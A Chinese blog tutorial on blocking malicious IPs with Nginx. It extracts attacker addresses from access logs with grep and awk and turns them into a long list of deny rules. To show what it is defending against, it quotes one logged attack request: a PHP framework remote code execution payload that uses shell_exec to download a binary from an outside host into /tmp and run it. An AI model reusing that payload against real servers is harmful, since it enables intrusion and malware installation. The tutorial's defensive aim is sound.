使用 Nginx 阻止恶意 IP 访问

时间:2022-02-21 07:55:16

找到具有明显特征的访问记录,比如:

156.203.12.198 -[/Dec/::: +] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1"   "-" "Ouija_x.86/2.0" "-"

也许是某个开源框架的漏洞,执行参数上带的方法,达到下载指定文件然后执行的目的,由于危险性,所以 shell_exec 这类函数默认在 php.ini 是禁用的。

匹配特征找出不重复的 IP,写入文件:

$ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips

编辑一个 nginx 配置,加入到 location 访问中:

$ cat blockips > /etc/nginx/conf.d/blockips.conf

location / {
    include /etc/nginx/conf.d/blockips.conf
    xxxx;
}

编辑 blockips.conf,行首加 "deny ",行尾加 ";"

%s/^/deny /g

%s/$/\;/g

重载 nginx,这些 IP 访问就是403:

# 宿主机模式

$ nginx -s reload

# Docker模式

$ docker-compose restart nginx

附一份恶意访问IP:

deny 156.194.121.215;

deny 156.195.107.210;

deny 156.195.39.140;

deny 156.195.45.250;

deny 156.196.146.114;

deny 156.196.17.47;

deny 156.196.229.206;

deny 156.196.6.26;

deny 156.198.62.131;

deny 156.200.245.40;

deny 156.201.18.181;

deny 156.202.190.62;

deny 156.202.251.75;

deny 156.202.76.2;

deny 156.202.84.179;

deny 156.203.12.198;

deny 156.203.210.142;

deny 156.203.244.51;

deny 156.203.7.75;

deny 156.205.251.198;

deny 156.205.81.35;

deny 156.206.136.3;

deny 156.206.182.152;

deny 156.206.187.73;

deny 156.206.231.65;

deny 156.207.242.8;

deny 156.208.42.167;

deny 156.209.137.91;

deny 156.209.40.94;

deny 156.212.251.36;

deny 156.214.142.160;

deny 156.214.43.68;

deny 156.217.6.172;

deny 156.217.9.164;

deny 156.218.133.186;

deny 156.218.246.73;

deny 156.219.214.185;

deny 156.221.182.18;

deny 156.222.20.232;

deny 157.230.121.160;

deny 167.172.104.251;

deny 192.64.86.141;

deny 197.33.213.164;

deny 197.33.38.103;

deny 197.34.0.63;

deny 197.35.49.18;

deny 197.36.233.108;

deny 197.36.33.241;

deny 197.36.4.226;

deny 197.36.60.220;

deny 197.40.152.66;

deny 197.41.192.255;

deny 197.41.76.25;

deny 197.42.153.234;

deny 197.43.203.16;

deny 197.46.143.130;

deny 197.46.88.69;

deny 197.52.120.153;

deny 197.52.86.59;

deny 197.53.154.219;

deny 197.57.10.160;

deny 197.58.107.10;

deny 197.61.10.30;

deny 197.61.18.238;

deny 197.61.62.151;

deny 197.62.106.69;

deny 197.63.152.246;

deny 41.232.65.205;

deny 41.233.204.74;

deny 41.235.104.130;

deny 41.236.148.6;

deny 41.236.3.171;

deny 41.238.205.186;

deny 41.238.34.214;

deny 41.35.143.95;

deny 41.36.168.29;

deny 41.36.196.47;

deny 41.36.20.93;

deny 41.36.221.70;

deny 41.40.31.77;

deny 41.42.219.201;

deny 41.42.59.4;

deny 41.43.34.248;

deny 41.44.120.131;

deny 41.45.98.34;

deny 41.46.62.42;

deny 41.47.75.136;

deny 80.10.22.62;

deny 95.14.156.128;
deny 156.196.181.71;

deny 156.196.191.37;

deny 156.196.197.156;

deny 156.196.3.62;

deny 156.197.229.125;

deny 156.201.133.105;

deny 156.201.98.17;

deny 156.202.112.54;

deny 156.202.152.246;

deny 156.202.31.234;

deny 156.202.39.255;

deny 156.203.54.61;

deny 156.203.96.174;

deny 156.204.165.223;

deny 156.205.169.68;

deny 156.206.214.19;

deny 156.208.49.5;

deny 156.208.51.140;

deny 156.209.187.210;

deny 156.209.35.200;

deny 156.212.44.77;

deny 156.213.35.145;

deny 156.216.156.144;

deny 156.218.136.219;

deny 156.219.45.190;

deny 156.220.186.189;

deny 156.221.230.75;

deny 156.221.8.69;

deny 182.64.156.46;

deny 197.33.205.142;

deny 197.33.214.152;

deny 197.33.99.150;

deny 197.34.177.145;

deny 197.35.113.116;

deny 197.35.85.109;

deny 197.36.186.126;

deny 197.36.19.18;

deny 197.37.180.73;

deny 197.38.244.62;

deny 197.40.184.150;

deny 197.40.238.169;

deny 197.41.112.15;

deny 197.41.178.87;

deny 197.41.86.1;

deny 197.43.220.39;

deny 197.45.9.234;

deny 197.46.71.54;

deny 197.47.108.224;

deny 197.47.221.54;

deny 197.52.165.67;

deny 197.54.42.198;

deny 197.56.28.28;

deny 197.56.59.108;

deny 197.57.167.86;

deny 197.57.219.86;

deny 197.59.221.148;

deny 197.61.186.6;

deny 197.61.85.58;

deny 197.62.227.36;

deny 197.63.13.29;

deny 197.63.205.232;

deny 41.232.17.135;

deny 41.232.27.153;

deny 41.234.133.17;

deny 41.235.102.192;

deny 41.235.244.63;

deny 41.236.223.4;

deny 41.236.56.8;

deny 41.237.33.100;

deny 41.239.135.65;

deny 41.239.77.234;

deny 41.42.35.168;

deny 41.42.59.130;

deny 41.45.30.236;

deny 41.46.236.128;

deny 41.46.255.174;
deny 141.98.80.117;

deny 141.98.80.42;

deny 185.153.196.48;

deny 185.153.198.163;

deny 185.153.199.3;

deny 185.156.177.10;

deny 193.106.31.202;

deny 193.188.22.123;

deny 193.188.22.187;
deny 193.188.22.234;

deny 193.188.22.76;

deny 193.188.23.25;
deny 39.107.142.5;

deny 41.216.186.89;

deny 45.141.86.144;

deny 46.161.27.112;

Link:https://www.cnblogs.com/farwish/p/12080630.html

使用 Nginx 阻止恶意 IP 访问的更多相关文章

  1. 服务器安全策略之《通过IP安全策略阻止某个IP访问的设置方法》

    现在我们在布署好了一个网站,发布到外网后就意味着将会接受来自四面八方的黑客攻击,这个情况很常见,我们的网站基本上每天都要接受成千上万次的攻击,有SQL注入的.有代码注入的.有CC攻击等等...而我作为 ...

  2. Nginx 拒绝指定IP访问

    来源 : http://www.ttlsa.com/nginx/nginx-deny-ip-access/   闲来无事,登陆服务器,发现有个IP不断的猜测路径.试图往服务器上传文件(木马).于是查看 ...

  3. nginx限制恶意IP处理方法

    思考了几种方案,最终考虑使用ip黑名单的方式: 处理方法: 一.nginx黑名单方式: 1.过滤日志访问API接口的IP,统计每10分钟调用超过100次的IP,直接丢进nginx的访问黑名单 2.具体 ...

  4. Nginx禁止使用ip访问,只允许使用域名访问

    Nginx虚拟主机配置,vhosts下面有很多域名的配置: [root@external-lb01 vhosts]# pwd/data/nginx/conf/vhosts [root@external ...

  5. nginx 禁止某IP访问

    首先建立下面的配置文件放在nginx的conf目录下面,命名为blocksip.conf: deny 95.105.25.181; 保存一下. 在nginx的配置文件nginx.conf中加入:inc ...

  6. Nginx 如何限定IP访问

    在nginx.conf中的server限制段中.deny IP.表示需要限制该IP不可访问.allow IP表示权该IP可以访问. 如上图.表示阻止192.168.1.122的IP的访问.那当然也可以 ...

  7. 分享:linux系统如何快速阻止恶意IP地址

    可能你想要在各种情形下阻止有人通过IP地址访问你的Linux系统.比如说,作为最终用户,你可能想要保护自己,避免已知的间谍软件或跟踪者的IP地址.或者如果你在运行P2P软件,可能想要把来自与违反P2P ...

  8. nginx限制单个IP访问配置

    最近公司做了一个砸金蛋的活动,经过几天的发酵宣传后,每天以几万的的用户数在增长,后面才发现原来有人专门为此开发了一个全自动注册的软件 一时间网站被刷得打开异常缓慢,查看日志发现大部分都是用软件在刷,于 ...

  9. nginx判定国家ip访问网站

    我们可以通过GeoIP模块和MaxMind免费数据库来实现.MaxMind具有新版本的数据库GeoLite2,它仅支持CSV和mmdb格式.可以支持mngx_http_geoip2_modulemdb ...

随机推荐

  1. 基于FS4412的DS18B20温度采集编程实现(1-时序分析)

    作者:秦老师,华清远见嵌入式学院讲师. 一.DS18B20简介 DS18B20是常用的数字温度计.DS18B20数字温度计提供9至12位(可配置)温度读数,表明该设备的温度. 信息通过单总线接口被发送 ...

  2. Linux 问题汇总

    centos主机发现大量的TIME_WAIT  解决方法: vim /etc/sysctl.conf #编辑文件,加入以下内容: net.ipv4.tcp_syncookies = 1 net.ipv ...

  3. ATS日志说明

    在ATS日志中我们经常遇到形形色色的缓存结果码,为了更清晰地认识它们,相关资料整理到这里: TCP_HIT 请求对象的一份合法拷贝被缓存,ATS将发送该对象给client TCP_MISS 请求对象未 ...

  4. 基于IPV6数据包的分析(GNS3)

    一.实验拓扑 二.路由配置 1.路由R1的详细配置(以R1为例,R2与R3相同) R1(config)#interface fastEthernet 0/1 R1(config-if)#ipv6 ad ...

  5. 简单测试 Kotlin native 性能

    准备 一直使用kotlin JVM平台开发服务器的应用,最近想试试看 Kotlin native的性能. 我使用的是 kotlin native 1.3.21,要使用他非常的简单,下载最新的 IDEA ...

  6. http://ctf.bugku.com/challenges#Easy_Re

      今天做一道逆向题,开心,见证了自己汇编的用途.     首先看它是否加壳? 1.加壳检测   是vc编程的,没有加壳,可以愉快地分析了.   2.分析程序,找到flag.   首先运行一下子程序, ...

  7. lua lua_settable

    void lua_settable (lua_State *L, int index); Does the equivalent to t[k] = v, where t is the value a ...

  8. test20190320 全连(fc)

    题意 全连(fc) [题目背景] 还记得若干年前那段互相比较<克罗地亚狂想曲>的分数的日子吗? [题目描述] E.Space 喜欢打音游. 但是他技术不好,总是拿不到全连(Full Com ...

  9. python—退出ipython3的help&lpar;&rpar;

    退出ipython3的help() 组合键:ctrl+z

  10. Vue 组件通信(子组件向父组件传递数据)

    1.自定义事件 <!DOCTYPE html> <html lang="zh"> <head> <meta charset="U ...

相关文章